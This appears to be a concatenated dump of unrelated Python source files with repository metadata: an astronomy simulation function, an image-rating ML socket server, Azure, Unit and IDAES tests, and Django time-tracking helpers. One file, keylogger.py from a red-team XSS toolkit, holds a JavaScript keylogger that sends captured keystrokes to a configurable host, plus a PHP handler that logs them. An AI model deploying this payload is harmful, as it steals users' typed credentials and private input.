        name of a txt file in which the values of optional keywords are saved. prefix_atm_data, sourcefolder, save_name_data, savefolder, n_jobs, save_P, save_T and EL_vec must still be set outside the file. Only used when input_dictionary is set to 'path'. The default is ''. Order of the entries in the txt file must be: F_min, num_bins, spec_res, f_spacing, num_filters, beam_radius, useDESIM, inclAtmosphere, D1, time, grid, x_length_strip, separation, galaxy_on, luminosity, redshift, linewidth, EL, max_num_strips, pwv_0, windspeed, n_batches.
Returns
-------
time_vector: array of floats
Moments in time at which the signal is calculated.
center_freq: array of floats
Center frequencies of the MKIDs
Saves '<cwd>/output_TiEMPO/<save_name_data>+P_X.npy' OR '<savefolder>/<save_name_data>+P_X.npy': numpy array of floats
array of the power values of the signal in Watts. Dimensions are: [5 x #filters x #timesamples], as 5 pwv values are taken for each timesample
Saves '<cwd>/output_TiEMPO/<save_name_data>+T_X.npy' OR '<savefolder>/<save_name_data>+T_X.npy': numpy array of floats
array of the power values of the signal converted to sky temperature in Kelvins. Dimensions are: [5 x #filters x #timesamples], as 5 pwv values are taken for each timesample
"""
dictionary = get_dictionary(input_dictionary, prefix_atm_data, sourcefolder,\
save_name_data, savefolder, save_P, save_T, n_jobs, n_batches, obs_time, grid, \
x_length_strip, separation, galaxy_on,luminosity, redshift, \
linewidth, EL, EL_vec, max_num_strips, pwv_0, F_min, \
num_bins, spec_res, f_spacing, num_filters, \
beam_radius, useDESIM, inclAtmosphere, \
windspeed, D1, dictionary_name)
if dictionary['savefolder'] == None:
dictionary['savefolder'] = Path.cwd().joinpath('output_TiEMPO')
else:
dictionary['savefolder'] = convert_folder(dictionary['savefolder'])
dictionary['sourcefolder'] = convert_folder(dictionary['sourcefolder'])
if round(dictionary['separation']/dictionary['grid']) != 1e-6*round(1e6*dictionary['separation']/dictionary['grid']):
raise ValueError('The separation is not an integer multiple of the ARIS grid size. Consider changing the separation to {:.5f} m or {:.5f} m instead of {} m'.format(dictionary['grid']*np.floor(dictionary['separation']/dictionary['grid']), dictionary['grid']*np.ceil(dictionary['separation']/dictionary['grid']), dictionary['separation']))
num_steps = dictionary['separation'] / (dictionary['windspeed']/160)
if round(num_steps) != num_steps:
raise ValueError('Separation is not an integer multiple of atmosphere distance per sample. Consider changing the windspeed to {} m/s or {} m/s instead of {} m/s'.format(dictionary['separation']*160/np.ceil(num_steps), dictionary['separation']*160/np.floor(num_steps), dictionary['windspeed']))
max_obs_time = calcMaxObsTime(dictionary)
if obs_time > max_obs_time:
raise ValueError('obs_time must be smaller than: ', max_obs_time)
if dictionary['n_jobs'] < 1:
raise ValueError('Please set a number of threads greater than or equal to 1 in n_jobs.')
if dictionary['n_batches'] < 1:
raise ValueError('Please set a number of signal batches greater than or equal to 1 in n_batches.')
st1 = st.signal_transmitter(dictionary)
[time_vector, center_freq] = st1.transmit_signal_DESIM_multf_atm()
return time_vector, center_freq | 52.421622 | 537 | 0.657352 |
222d9fdee9ee65ebc280e66218d1f4f7df620dc6 | 11,854 | py | Python | Server_and_client/ML_Server.py | tomercahal/Statispic | a15cd664fdecff82ff0ab425a9f51134525be0fa | [
"MIT"
] | 1 | 2020-04-02T09:19:36.000Z | 2020-04-02T09:19:36.000Z | Server_and_client/ML_Server.py | tomercahal/Statispic | a15cd664fdecff82ff0ab425a9f51134525be0fa | [
"MIT"
] | null | null | null | Server_and_client/ML_Server.py | tomercahal/Statispic | a15cd664fdecff82ff0ab425a9f51134525be0fa | [
"MIT"
] | null | null | null | #For the ML
#from keras.models import load_model
from tensorflow.keras.models import load_model
import numpy as np
# For the rest of the server
import socket
import threading
import sys
import zipfile
import os
import cv2 as cv
from cryptography.fernet import Fernet # Used to create a key, encrypt and decrypt messages
SEPARATOR = "<SEPARATOR>" # Used when delivering the file name and file size.
def load_images_for_trained_model(before_images_path, list_of_dirs):
"""This function is the same function used to manipulate the images to get them ready for prediction.
The function receives the path before the images names, and a list of just the basename of the images, for
example (photo1.jpg).After the server has the images from the user he will use this function in order
to prepare the images for prediction."""
print(list_of_dirs)
images = []
    # initialize the images given and prepare them for prediction
for im_dir in list_of_dirs:
print(im_dir)
image = cv.imread(before_images_path + "/" + im_dir)
# cv.imshow('sample image', image) #for showing the image
# cv.waitKey(0)
image = cv.resize(image, (400, 400))
images.append(image)
return np.array(images)
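# Example call (the folder and file names are made up for illustration):
#   batch = load_images_for_trained_model('D:/Statispic/Server_and_client/thread1',
#                                         ['server_photo1.jpg', 'server_photo2.jpg'])
# 'batch' then has shape (2, 400, 400, 3); divide it by 255.0 before feeding it to
# the model, as predict_on_images_and_send_result does below.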
class Server (object):
def __init__(self):
"""The constructor of the Server"""
self.IP = '127.0.0.1' # The IP of the server.
        self.PORT = 220 # The chosen port to have the connection on
        self.users_allowed = sys.maxsize # This is the number of users that are allowed to be logged in at the same time
self.sem = threading.Semaphore(self.users_allowed) # using semaphore in order to handle the threads
self.ML_model_location = "D:/Statispic/final-statispic_model.hdf5"
self.ML_model = load_model("D:/Statispic/final-statispic_model.hdf5") # Loading the ML model
self.server_file_extract_dir = "D:/Statispic/Server_and_client/thread"
self.encrypt_key_path = "D:/Statispic2/Server_and_client/key.key" # Where the key is located at
self.encryption_key = self.read_key() # Getting the encryption key from the key file
self.decryptor = Fernet(self.encryption_key) # Initializing the Fernet with the key
def read_key(self):
"""A function that reads the the key from the self.encrypt_key_path and returns it"""
with open(self.encrypt_key_path, "rb") as file:
return file.read() # Returning the key
def predict_on_images_and_send_result(self, client_sock, pic_dir):
"""This function will get the images np array, make the predictions on them.
Find the best image, return it to the user and release the thread."""
dirs_list = [] # This list will contain the directories of the images for prediction
for (dirpath, dirnames, filenames) in os.walk(pic_dir):
dirs_list.extend(filenames)
break
print("The images that the predictions are going to be on are:")
print(dirs_list)
images_ready_for_prediction = load_images_for_trained_model(pic_dir, dirs_list) # Getting the images ready for prediction
images_ready_for_prediction = images_ready_for_prediction / 255.0 # normalizing
prediction = self.ML_model.predict(images_ready_for_prediction) # Predicting the ratios for the images
prediction_mul_list = prediction.tolist()
prediction_list = [val for sublist in prediction_mul_list for val in sublist] # Using list comprehension
print(prediction_list)
for i in range(len(dirs_list)):
print("X(image dir)=%s, Predicted value=%s" % (dirs_list[i], prediction[i])) # Printing the predictions
best_image_dir = dirs_list[prediction_list.index(max(prediction_list))] # Super sick!!
print("The best image is: " + best_image_dir + " !!!!")
client_sock.send(best_image_dir[7:].encode()) # Sending the best image dir to the client
self.sem.release() # Releasing the client after he has gotten his result.
def receiving_loop(self, client_sock): # Not used, using the encrypted version
"""This is one of the most important functions in the server! It receives the client socket and reads
from it until it reaches the \r\n\r\n (marking the client is sending image data now. This function returns
the filesize, filename and might contain the beginning of the image data!"""
part = b""
final_parts = []
start_of_image = b""
while True:
received = self.decryptor.decrypt(client_sock.recv(1024))
# received = client_sock.recv(1024)
if b"\r\n\r\n" in received: # Checking if we have reached the image data
parts = received.split(b"\r\n\r\n") # Getting the part before the image metadata(size,name) and after.
print("Reached image metadata!")
final_parts.append(part + parts[0]) # Parts[0] should contain a piece of a part
start_of_image += parts[1] # Probably going to contain the start of the image data
break
else:
part += received # Just adding the total message since haven't reached image data
parts_again = final_parts[0].split(b"\r\n")
filesize = parts_again[0].decode() # Getting string instead of bytes
filename = parts_again[1].decode() # Getting string instead of bytes
return filesize, filename, start_of_image
def encrypted_receiving_loop(self, client_sock, size_left, metadata_start):
"""This is one of the most important functions in the server! It receives the client socket, the amount of bytes
left to read from the buffer until the end of the message, and the metadata start if there is one. The function
returns the image name and the image data."""
metadata_total = metadata_start # Starting the total with the start of the metadata
how_many_bytes = 2048 # The amount of bytes that we are going to receive
while size_left > 0: # Running in a loop while we did not receive the whole size.
if size_left < how_many_bytes: # This will happen on the last recv needed
how_many_bytes = size_left
data = client_sock.recv(how_many_bytes) # Reading from the buffer
size_left -= len(data) # Decreasing the bytes left to read from the buffer.
metadata_total += data
decrypted_metadata = self.decryptor.decrypt(metadata_total) # Decrypting the metadata.
parts_of_metadata = decrypted_metadata.split(b"\r\n\r\n") # Getting the name and image_parts
image_name = parts_of_metadata[0].decode() # Need the string of the image_name
image_data = parts_of_metadata[1] # Need to leave the image_data as bytes
return image_name, image_data
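    # Wire format handled by encrypted_receiving_loop together with get_images_from_user
    # below (as implemented in this class):
    #   <metadata length in ASCII>\r\n<Fernet-encrypted blob>
    # where the decrypted blob is '<file name>' + '\r\n\r\n' + <raw image bytes>.
    # The length line tells the server how many encrypted bytes to keep recv()-ing.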
def get_images_from_user(self, client_sock, thread_num):
"""This function gets the client socket and the thread number. This function receives all of the client's
        image files; this includes the filesizes, the filenames and the actual images. This function then goes on
and calls predict_on_images_and_send_result."""
print('You are thread number: ' + str(thread_num))
        self.sem.acquire() # Acquire a semaphore slot, limiting how many users are handled at the same time (new thread opened)
number_of_files = int(client_sock.recv(1024).decode())
print(f"The number of files that the user is going to send is: {number_of_files}")
subfolder_name = "thread" + str(thread_num)
if not os.path.isdir(self.server_file_extract_dir + str(thread_num)):
os.mkdir(subfolder_name) # Create the subfolder
for i in range(number_of_files):
# receive the file infos
print("Receiving file number " + str(i+1))
initial_receiver = client_sock.recv(8192) # Fist initial
print(initial_receiver)
parts = initial_receiver.split(b"\r\n", 1) # Only splitting it once. Want the size of the metadata
metadata_size = int(parts[0].decode()) # Getting the int size of the metadata
metadata_start = parts[1] # Might have some of the metadata in the initial_receiver
total_size_left_to_recv = metadata_size - len(metadata_start) # How many more bytes left for recv.
filename, image_bytes = self.encrypted_receiving_loop(client_sock, total_size_left_to_recv, metadata_start)
# Getting the filename and the image_bytes data
filename = os.path.basename(filename) # Getting the basename of the file (for example image1.jpg)
print(f"os path basename is: {filename}")
file_dir_with_file = self.server_file_extract_dir + str(thread_num) + "/server_" + filename
# Building the full path name
print(f"Started saving picture number {i+1}, the name of it is: {filename}")
with open(file_dir_with_file, "wb") as f: # Going to be writing bytes to the file.
f.write(image_bytes) # Inserting the bytes into the image and creating it.
print(f"Finished download for file number {i+1}, the name of it is: {filename}")
self.predict_on_images_and_send_result(client_sock, self.server_file_extract_dir + str(thread_num))
def start(self):
"""This is the server start function that is called in the beginning. This function accepts new clients
and starts the thread for them with the appropriate thread number."""
try:
print(f"Server starting up on {self.IP} port {self.PORT}")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Initializing the socket.
sock.bind((self.IP, self.PORT))
sock.listen(1) # Getting one client at a time.
thread_number = 0 # This will be sort of an ID for the thread, used in debugging
while True: # Keep accepting as many people that want to help (speed up the process)
thread_number += 1 # Increasing because of new client
print('\r\nWaiting for a new client')
client_socket, client_address = sock.accept()
print('New client entered!')
client_socket.sendall('Hello and welcome to Statispic\'s server. '
                                  'We hope we can help you achieve your goals of becoming an '
'instagram star!\r\nCreated by: Tomer Cahal'.encode()) # Message to the user
thread = threading.Thread(target=self.get_images_from_user, args=(client_socket, thread_number))
thread.start() # Starting the thread
except socket.error as e:
print(e)
if __name__ == '__main__':
s = Server()
s.start()
#
# with zipfile.ZipFile(self.local_file_name, 'r') as zip_file:
# print("Extracting files...")
# print(zip_file.namelist())
# for member in zip_file.namelist():
# print(member)
# filename = os.path.basename(member) # Extracting the file name itself from the name
# print(filename)
# if not filename: # Skip directories
# continue
# # copy file (taken from zipfiles' extract)
# source = member # zip_file.open(member)
# #target = os.path.join(self.server_file_extract_dir, filename)
# target = self.server_file_extract_dir + "/" + filename
# print(source, target)
# with source, target:
# shutil.copyfile(source, target)
# print("Done extracting...") | 56.990385 | 131 | 0.655812 |
09cbf5fdbf02b965508fb3950fafce1223ab2c4c | 1,035 | py | Python | payloads/keylogger.py | redcode-labs/poXSSon | 7046fac15e54e05a73d7d46a00916161d9f36cca | [
"ISC"
] | 18 | 2022-02-20T13:27:36.000Z | 2022-03-23T21:35:13.000Z | payloads/keylogger.py | redcode-labs/poXSSon | 7046fac15e54e05a73d7d46a00916161d9f36cca | [
"ISC"
] | 1 | 2022-02-20T13:37:20.000Z | 2022-02-21T14:38:26.000Z | payloads/keylogger.py | redcode-labs/poXSSon | 7046fac15e54e05a73d7d46a00916161d9f36cca | [
"ISC"
] | 2 | 2022-02-20T13:35:56.000Z | 2022-02-21T11:59:15.000Z | #!/usr/bin/python3.7
import socket
import http.server
def local_ip():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except:
return "N/A"
name="keylogger"
description="Captures keystrokes and sends them to an external host"
options = [["LHOST", "Host to send captured strokes to", local_ip()],
["INTERVAL", "Number of seconds after which captured keystrokes are sent", "1"]]
handler_options = [["LOGFILE", "File to write keystrokes to", "keystrokes.txt"]]
payload = """
var keys='';
document.onkeypress = function(e) {
get = window.event?event:e;
key = get.keyCode?get.keyCode:get.charCode;
key = String.fromCharCode(key);
keys+=key;
}
window.setInterval(function(){
new Image().src = 'http://LHOST:8000/handler.php?c='+keys;
keys = '';
}, INTERVAL*1000);
"""
handler = """
<?php
shell_exec("ls");
if(!empty($_GET['c'])) {
$f=fopen("LOGFILE","a+");
fwrite($f,$_GET['c']);
fclose($f);
}
?>
"""
| 24.642857 | 91 | 0.629952 |
ce3db34940e8819e06eab7d5bfd8e330bee3b0bb | 951 | py | Python | sdk/eventhub/azure-eventhubs/tests/test_iothub_receive.py | pjquirk/azure-sdk-for-python | cbf02ec4f177b96eae1dbbba87c34c2c93880150 | [
"MIT"
] | 1 | 2021-09-07T18:36:04.000Z | 2021-09-07T18:36:04.000Z | sdk/eventhub/azure-eventhubs/tests/test_iothub_receive.py | pjquirk/azure-sdk-for-python | cbf02ec4f177b96eae1dbbba87c34c2c93880150 | [
"MIT"
] | 2 | 2019-10-02T23:37:38.000Z | 2020-10-02T01:17:31.000Z | sdk/eventhub/azure-eventhubs/tests/test_iothub_receive.py | xiafu-msft/azure-sdk-for-python | 4d9560cfd519ee60667f3cc2f5295a58c18625db | [
"MIT"
] | null | null | null | #-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
import os
import pytest
import time
from azure import eventhub
from azure.eventhub import EventData, EventHubClient, Offset
@pytest.mark.liveTest
def test_iothub_receive_sync(iot_connection_str, device_id):
client = EventHubClient.from_iothub_connection_string(iot_connection_str, debug=True)
receiver = client.add_receiver("$default", "0", operation='/messages/events')
try:
client.run()
partitions = client.get_eventhub_info()
assert partitions["partition_ids"] == ["0", "1", "2", "3"]
received = receiver.receive(timeout=5)
assert len(received) == 0
finally:
client.stop() | 36.576923 | 89 | 0.60673 |
1cc59c67e70b29404f44c635eaea09da7ec4e893 | 783 | py | Python | test/test_go_isolation_rootfs.py | afxcn/unit | a336928e1027af92d0c9bb2ccb369a3f9b53abae | [
"Apache-2.0"
] | 10 | 2018-11-14T10:58:41.000Z | 2021-12-11T01:43:51.000Z | test/test_go_isolation_rootfs.py | afxcn/unit | a336928e1027af92d0c9bb2ccb369a3f9b53abae | [
"Apache-2.0"
] | 1 | 2021-02-07T06:35:24.000Z | 2021-02-07T06:35:24.000Z | test/test_go_isolation_rootfs.py | afxcn/unit | a336928e1027af92d0c9bb2ccb369a3f9b53abae | [
"Apache-2.0"
] | 3 | 2018-10-31T12:10:05.000Z | 2019-02-14T14:09:48.000Z | import os
import pytest
from unit.applications.lang.go import TestApplicationGo
class TestGoIsolationRootfs(TestApplicationGo):
prerequisites = {'modules': {'go': 'all'}}
def test_go_isolation_rootfs_chroot(self, is_su, temp_dir):
if not is_su:
pytest.skip('requires root')
if os.uname().sysname == 'Darwin':
pytest.skip('chroot tests not supported on OSX')
isolation = {
'rootfs': temp_dir,
}
self.load('ns_inspect', isolation=isolation)
obj = self.getjson(url='/?file=/go/app')['body']
assert obj['FileExists'] == True, 'app relative to rootfs'
obj = self.getjson(url='/?file=/bin/sh')['body']
assert obj['FileExists'] == False, 'file should not exists'
| 26.1 | 67 | 0.618135 |
123ac6e522accb44d3043d8dea5ff72b38429410 | 5,700 | py | Python | sw_excel_parser/engines.py | telminov/sw-excel-parser | 5a9aa8eb8b6c3af2083612114e42e38598ce7e7b | [
"MIT"
] | null | null | null | sw_excel_parser/engines.py | telminov/sw-excel-parser | 5a9aa8eb8b6c3af2083612114e42e38598ce7e7b | [
"MIT"
] | 4 | 2017-12-07T05:43:03.000Z | 2017-12-14T02:41:03.000Z | sw_excel_parser/engines.py | telminov/sw-excel-parser | 5a9aa8eb8b6c3af2083612114e42e38598ce7e7b | [
"MIT"
] | null | null | null | from collections import OrderedDict
from itertools import chain
from typing import List, Dict, Optional, Set
import xlrd
from xlrd.sheet import Sheet
class BaseEngine:
item = None
def __init__(self, workbook: xlrd.Book = None, file_contents: bytes = None, *args, **kwargs):
self.workbook = None
self.set_workbook(workbook, file_contents)
self.sheet_items = OrderedDict()
def __iter__(self):
return iter(self.sheet_items.items())
def keys(self):
return self.sheet_items.keys()
def items(self):
return self.sheet_items.items()
def values(self):
return self.sheet_items.values()
def set_workbook(self, workbook: xlrd.Book = None, file_contents: bytes = None):
if file_contents:
self.workbook = xlrd.open_workbook(file_contents=file_contents)
elif workbook:
self.workbook = workbook
def get_sheets(self) -> List[Sheet]:
if not self.workbook:
raise ValueError('You must provide workbook or file_contents')
return self.workbook.sheets()
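    # find_headers (below) scans each sheet row by row and records the first row whose
    # cell values contain every field header declared on ``self.item`` (the set
    # comparison ``row_values >= header``); sheets without such a row are left out
    # of the returned mapping.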
def find_headers(self) -> Dict[Sheet, Optional[int]]:
sheets = self.get_sheets()
fields = self.item._unbound_fields.values()
header = {field.kwargs['header'].lower() for field in fields}
result = OrderedDict()
for sheet in sheets:
sheet_data = (sheet.row_values(nrow) for nrow in range(sheet.nrows))
for nrow, row_values in enumerate(sheet_data):
row_values = {str(field).lower().strip() for field in row_values}
if row_values >= header:
result[sheet] = nrow
break
else:
self.lost_header_handler(header=header, row_values=row_values)
return result
def lost_header_handler(self, header, row_values) -> None:
pass
def get_header(self, sheet) -> Optional[List[str]]:
header = None
header_map = self.find_headers()
if sheet in header_map:
header_nrow = header_map[sheet]
header = sheet.row_values(header_nrow)
return header
def prepare_items(self) -> None:
header_map = self.find_headers()
for sheet, header_nrow in header_map.items():
data_offset = header_nrow + 1
sheet_header = list(title.lower().strip() for title in self.get_header(sheet))
sheet_data = list(sheet.row_values(nrow) for nrow in range(data_offset, sheet.nrows))
if sheet_data:
self.sheet_items[sheet] = []
for nrow, row_data in enumerate(sheet_data, start=data_offset):
item = self.item(nrow, dict(zip(sheet_header, row_data)))
self.sheet_items[sheet].append(item)
def parse(self) -> None:
self.sheet_items.clear()
self.prepare_items()
def is_recognized(self) -> bool:
headers_nrows = self.find_headers().values()
return any(nrow is not None for nrow in headers_nrows)
def get_cleaned_data(self):
cleaned_data = OrderedDict()
for sheet, items in self.items():
sheet_data = []
for item in items:
if item.cleaned_data:
sheet_data.append(item.cleaned_data)
cleaned_data[sheet.name] = sheet_data
return cleaned_data
class StatsMixin:
def __init__(self, *args, **kwargs):
super(StatsMixin, self).__init__(*args, **kwargs)
self.stats = {}
def parse(self) -> None:
self.stats.clear()
super().parse()
self.compute_stats()
def compute_stats(self) -> None:
items = list(chain.from_iterable(self.sheet_items.values()))
success_count = len([item for item in items if item.is_valid()])
errors_count = len(items) - success_count
erroneous_sheets = [sheet.name for sheet, items in self if any(not item.is_valid() for item in items)]
self.stats = dict(
total_count=len(items),
success_count=success_count,
errors_count=errors_count,
erroneous_sheets=erroneous_sheets
)
class ErrorsMixin:
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.lost_headers = set()
self.errors = {}
def parse(self) -> None:
self.lost_headers.clear()
self.errors.clear()
super().parse()
self.collect_errors()
def lost_header_handler(self, header: Set[str], row_values: Set[str]) -> None:
if header & row_values:
self.lost_headers.update(header - row_values)
def collect_errors(self) -> None:
items = list(chain.from_iterable(self.values()))
erroneous_items = [item for item in items if not item.is_valid()]
self.errors = dict(
non_field_errors=dict(
lost_headers=self.lost_headers
)
)
for item in erroneous_items:
for name, field in item.fields.items():
if name in item.errors:
if name not in self.errors:
self.errors[name] = dict(
label=field.header,
rows=[]
)
self.errors[name]['rows'].append(
dict(
nrow=item.nrow,
value=field.extract_data(item.data),
error=str(item.errors[name])
)
)
class Engine(ErrorsMixin, StatsMixin, BaseEngine):
pass
| 31.491713 | 110 | 0.583509 |
68b5f96342b7d0fa1f982c3962326401240505ee | 7,477 | py | Python | idaes/core/util/tests/test_model_diagnostics.py | CATER-UCF/idaes-pse | afccbd43e56dc39d63542b4d400ac027b0ccbe84 | [
"RSA-MD"
] | null | null | null | idaes/core/util/tests/test_model_diagnostics.py | CATER-UCF/idaes-pse | afccbd43e56dc39d63542b4d400ac027b0ccbe84 | [
"RSA-MD"
] | null | null | null | idaes/core/util/tests/test_model_diagnostics.py | CATER-UCF/idaes-pse | afccbd43e56dc39d63542b4d400ac027b0ccbe84 | [
"RSA-MD"
] | 1 | 2022-03-17T11:08:43.000Z | 2022-03-17T11:08:43.000Z | #################################################################################
# The Institute for the Design of Advanced Energy Systems Integrated Platform
# Framework (IDAES IP) was produced under the DOE Institute for the
# Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021
# by the software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University
# Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and
# license information.
#################################################################################
"""
This module contains model diagnostic utility functions for use in IDAES (Pyomo) models.
"""
import pytest
# Need to update
import pyomo.environ as pyo
# TODO: Add pyomo.dae test case
"""
from pyomo.environ import TransformationFactory
from pyomo.dae import ContinuousSet, DerivativeVar
"""
# Need to update
from idaes.core.util.model_diagnostics import *
# Author: Alex Dowling
# This was from
# @pytest.fixture()
def problem1():
m = pyo.ConcreteModel()
m.I = pyo.Set(initialize=[i for i in range(5)])
m.x = pyo.Var(m.I, bounds=(-10, 10), initialize=1.0)
m.con1 = pyo.Constraint(expr=m.x[0] + m.x[1] - m.x[3] >= 10)
m.con2 = pyo.Constraint(expr=m.x[0] * m.x[3] + m.x[1] >= 0)
m.con3 = pyo.Constraint(expr=m.x[4] * m.x[3] + m.x[0] * m.x[3] - m.x[4] == 0)
m.obj = pyo.Objective(expr=sum(m.x[i] ** 2 for i in m.I))
return m
def example2(with_degenerate_constraint=True):
"""Create the Pyomo model for Example 2
Arguments:
with_degenerate_constraint: Boolean, if True, include the redundant linear constraint
Returns:
m2: Pyomo model
"""
m2 = pyo.ConcreteModel()
m2.I = pyo.Set(initialize=[i for i in range(1, 4)])
m2.x = pyo.Var(m2.I, bounds=(0, 5), initialize=1.0)
m2.con1 = pyo.Constraint(expr=m2.x[1] + m2.x[2] >= 1)
m2.con2 = pyo.Constraint(expr=m2.x[1] + m2.x[2] + m2.x[3] == 1)
m2.con3 = pyo.Constraint(expr=m2.x[2] - 2 * m2.x[3] <= 1)
m2.con4 = pyo.Constraint(expr=m2.x[1] + m2.x[3] >= 1)
if with_degenerate_constraint:
m2.con5 = pyo.Constraint(expr=m2.x[1] + m2.x[2] + m2.x[3] == 1)
m2.obj = pyo.Objective(expr=sum(m2.x[i] for i in m2.I))
return m2
def extract_constraint_names(cs):
"""Get constraint names from ComponentSet
Arguments:
cs: ComponentSet object
Return:
constraint_names: list of constraint names (strings)
"""
constraint_names = []
for i in cs:
constraint_names.append(i.name)
return constraint_names
# Problem 1
@pytest.mark.skipif(not pyo.SolverFactory("ipopt").available(False), reason="no Ipopt")
@pytest.mark.unit
def test_problem1():
# Create test problem
m = problem1()
# Specify Ipopt as the solver
opt = pyo.SolverFactory("ipopt")
# Specifying an iteration limit of 0 allows us to inspect the initial point
opt.options["max_iter"] = 0
# "Solving" the model with an iteration limit of 0 load the initial point and applies
# any preprocessors (e.g., enforces bounds)
opt.solve(m, tee=True)
# Create Degeneracy Hunter object
dh = DegeneracyHunter(m)
# Find constraints with residuals > 0.1
initial_point_constraints = dh.check_residuals(tol=0.1)
# Check there are 2 constraints with large residuals
assert len(initial_point_constraints) == 2
initial_point_constraint_names = extract_constraint_names(initial_point_constraints)
# Check first constraint
assert initial_point_constraint_names[0] == "con1"
# Check second constraint
assert initial_point_constraint_names[1] == "con3"
opt.options["max_iter"] = 50
# Solve
opt.solve(m, tee=True)
# Find constraints with residuals > 0.1
solution_constraints = dh.check_residuals(tol=1e-6)
# Check at the solution no constraints are violated
assert len(solution_constraints) == 0
# Check no constraints are near their bounds
solution_bounds = dh.check_variable_bounds(tol=0.1)
# Check at the solution no constraints are violated
assert len(solution_bounds) == 0
# Problem 2 without degenerate constraint
@pytest.mark.skipif(not pyo.SolverFactory("ipopt").available(False), reason="no Ipopt")
@pytest.mark.unit
def test_problem2_without_degenerate_constraint():
# Create test problem instance
m2 = example2(with_degenerate_constraint=False)
# Specify Ipopt as the solver
opt = pyo.SolverFactory("ipopt")
# Specifying an iteration limit of 0 allows us to inspect the initial point
opt.options["max_iter"] = 0
# "Solving" the model with an iteration limit of 0 load the initial point and applies
# any preprocessors (e.g., enforces bounds)
opt.solve(m2, tee=True)
# Create Degeneracy Hunter object
dh2 = DegeneracyHunter(m2)
# Check for violated constraints at the initial point
initial_point_constraints = dh2.check_residuals(tol=0.1)
# Check there are 1 constraints with large residuals
assert len(initial_point_constraints) == 1
initial_point_constraint_names = extract_constraint_names(initial_point_constraints)
# Check first constraint
assert initial_point_constraint_names[0] == "con2"
# Resolve
opt.options["max_iter"] = 500
opt.solve(m2, tee=True)
# Check solution
x_sln = []
for i in m2.I:
x_sln.append(m2.x[i]())
assert pytest.approx(x_sln[0], abs=1e-6) == 1.0
assert pytest.approx(x_sln[1], abs=1e-6) == 0.0
assert pytest.approx(x_sln[2], abs=1e-6) == 0.0
# Problem 2 with degenerate constraint
@pytest.mark.skipif(not pyo.SolverFactory("ipopt").available(False), reason="no Ipopt")
@pytest.mark.unit
def test_problem2_with_degenerate_constraint():
# Create test problem instance
m2 = example2(with_degenerate_constraint=True)
# Specify Ipopt as the solver
opt = pyo.SolverFactory("ipopt")
# Specifying an iteration limit of 0 allows us to inspect the initial point
opt.options["max_iter"] = 0
# "Solving" the model with an iteration limit of 0 load the initial point and applies
# any preprocessors (e.g., enforces bounds)
opt.solve(m2, tee=True)
# Create Degeneracy Hunter object
dh2 = DegeneracyHunter(m2)
# Check for violated constraints at the initial point
initial_point_constraints = dh2.check_residuals(tol=0.1)
# Check there are 2 constraints with large residuals
assert len(initial_point_constraints) == 2
initial_point_constraint_names = extract_constraint_names(initial_point_constraints)
# Check first constraint
assert initial_point_constraint_names[0] == "con2"
# Check first constraint
assert initial_point_constraint_names[1] == "con5"
# Resolve
opt.options["max_iter"] = 500
opt.solve(m2, tee=True)
# Check solution
x_sln = []
for i in m2.I:
x_sln.append(m2.x[i]())
assert pytest.approx(x_sln[0], abs=1e-6) == 1.0
assert pytest.approx(x_sln[1], abs=1e-6) == 0.0
assert pytest.approx(x_sln[2], abs=1e-6) == 0.0
# Check the rank
n_rank_deficient = dh2.check_rank_equality_constraints()
assert n_rank_deficient == 1
# TODO: Add MILP solver to idaes get-extensions and add more tests
| 29.788845 | 93 | 0.679684 |
08eab65ea5450a3d895d4fbb35b0897fce239850 | 1,323 | py | Python | apps/dashboard/utilities.py | SteinOveHelset/minutos | 73cdcb44409f97b05680c6a048f80eb4bd3f1f46 | [
"MIT"
] | 23 | 2020-11-19T19:33:34.000Z | 2022-03-02T15:43:08.000Z | apps/dashboard/utilities.py | SteinOveHelset/minutos | 73cdcb44409f97b05680c6a048f80eb4bd3f1f46 | [
"MIT"
] | 1 | 2021-04-03T18:02:50.000Z | 2021-04-03T18:02:50.000Z | apps/dashboard/utilities.py | SteinOveHelset/minutos | 73cdcb44409f97b05680c6a048f80eb4bd3f1f46 | [
"MIT"
] | 2 | 2021-01-23T02:06:59.000Z | 2021-09-09T04:58:09.000Z | # Import Python
from datetime import datetime
# Models
from apps.project.models import Entry
# Utility functions
def get_time_for_user_and_date(team, user, date):
entries = Entry.objects.filter(team=team, created_by=user, created_at__date=date, is_tracked=True)
return sum(entry.minutes for entry in entries)
def get_time_for_team_and_month(team, month):
entries = Entry.objects.filter(team=team, created_at__year=month.year, created_at__month=month.month, is_tracked=True)
return sum(entry.minutes for entry in entries)
def get_time_for_user_and_month(team, user, month):
entries = Entry.objects.filter(team=team, created_by=user, created_at__year=month.year, created_at__month=month.month, is_tracked=True)
return sum(entry.minutes for entry in entries)
def get_time_for_user_and_project_and_month(team, project, user, month):
entries = Entry.objects.filter(team=team, project=project, created_by=user, created_at__year=month.year, created_at__month=month.month, is_tracked=True)
return sum(entry.minutes for entry in entries)
def get_time_for_user_and_team_month(team, user, month):
entries = Entry.objects.filter(team=team, created_by=user, created_at__year=month.year, created_at__month=month.month, is_tracked=True)
return sum(entry.minutes for entry in entries) | 38.911765 | 156 | 0.792139 |
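# Editor-added sketch (not part of the original module): a hypothetical helper showing how
# the aggregation functions above are typically consumed; `team` and `user` are assumed to
# be existing model instances from this project.
def format_monthly_time(team, user, month):
    """Return the time a user tracked for a team in `month`, formatted as hours and minutes."""
    total_minutes = get_time_for_user_and_month(team, user, month)
    hours, minutes = divmod(int(total_minutes), 60)
    return f"{hours}h {minutes:02d}m"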
28ac3ec6248e281db810942a1c6e3e508f25da22 | 6,040 | py | Python | sqlalchemy_filters/models.py | ConnectHolland/sqlalchemy-filters | fbc3269094dae9fc48fa3f080b4881477709e8da | [
"Apache-2.0"
] | null | null | null | sqlalchemy_filters/models.py | ConnectHolland/sqlalchemy-filters | fbc3269094dae9fc48fa3f080b4881477709e8da | [
"Apache-2.0"
